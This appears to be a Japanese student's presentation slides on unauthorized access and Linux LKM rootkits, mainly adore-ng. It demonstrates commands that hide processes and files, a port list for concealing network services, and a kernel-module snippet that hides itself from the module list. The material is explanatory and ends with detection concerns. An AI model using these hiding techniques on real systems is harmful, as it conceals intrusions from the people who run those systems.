最終発表ー不正アクセスについてー環境情報学部３年櫻井美帆不正アクセス役立つツールがrootkit rootkit ログインの記録を書き換える機能  コマンドファイルの置き換えや改竄  ネットワークスニファ  バックドア  などのツールがまとめられている LKM rootkit コマンドバイナリを改竄する必要がないーファイルの整合性検査を回避できる  カーネル自身を操作するー正しい情報の取得が困難。発見も困難。  LKMRootkit 正常なプロセスシステムコールコマンドバイナリ正常な情報コマンドバイナリ偽りな情報ファイルシステム Rootkitだと… システムコールファイルシステム改ざんした偽のコマンドバイナリ LKMRootkitだと… システムコールコマンドバイナリファイルシステム Kernelレベルで乗っ取る偽りな情報 LKM rootkit ・adore ・adore-ng ・knark adore-ng Stealth氏によって開発されたLKMrootkit  主にLKM本体のadore-ng.oとクライアントプログラムのavaから構成されている  主な機能  process/ファイル/ネットワークなどの隠蔽  自分自身の隠蔽  ローカルバックドア processの隠蔽オプションで“i”をつけることにより隠蔽することができる # ps –efww|grep emacs Root 16863 1 0 Des12 ? 00:00:03 emacs –display 172.16.10.10:0.0 # ./ava i 16863 Checking for adore-ng or higher … adore-ng installed. Good luck. made PID 16863 invisible # ps –ef | grep emacs # ファイルの隠蔽ファイルも同様にオプションで“h”をつけることにより隠蔽することができる #./ava h xxxx ネットワーク接続の隠蔽 netstatコマンドの出力結果から、事前に設定しておいたサービス名、またはポート番号が含まれる行を除去することでネットワークサービスの隠蔽を行っている。 u_short HIDDEN_SERVICES[] = {2222, 7350, 0}; 自分自身の隠蔽 #include <linux/kernel.h> #include <linux/module.h> #include <linux/string.h> int init_module(){ if (__this_module.next) __this_module.next = __this_module.next->next; return 0; } int cleanup_module(){ return 0; } まとめ・ハードウェアに近づけば近づくほど見つけるのが困難となる。・正常な状態を覚えておいて悪いところを発見するのは困難。・メモリー空間上の書き換えを制限するような仕組みをつくればよいのでは？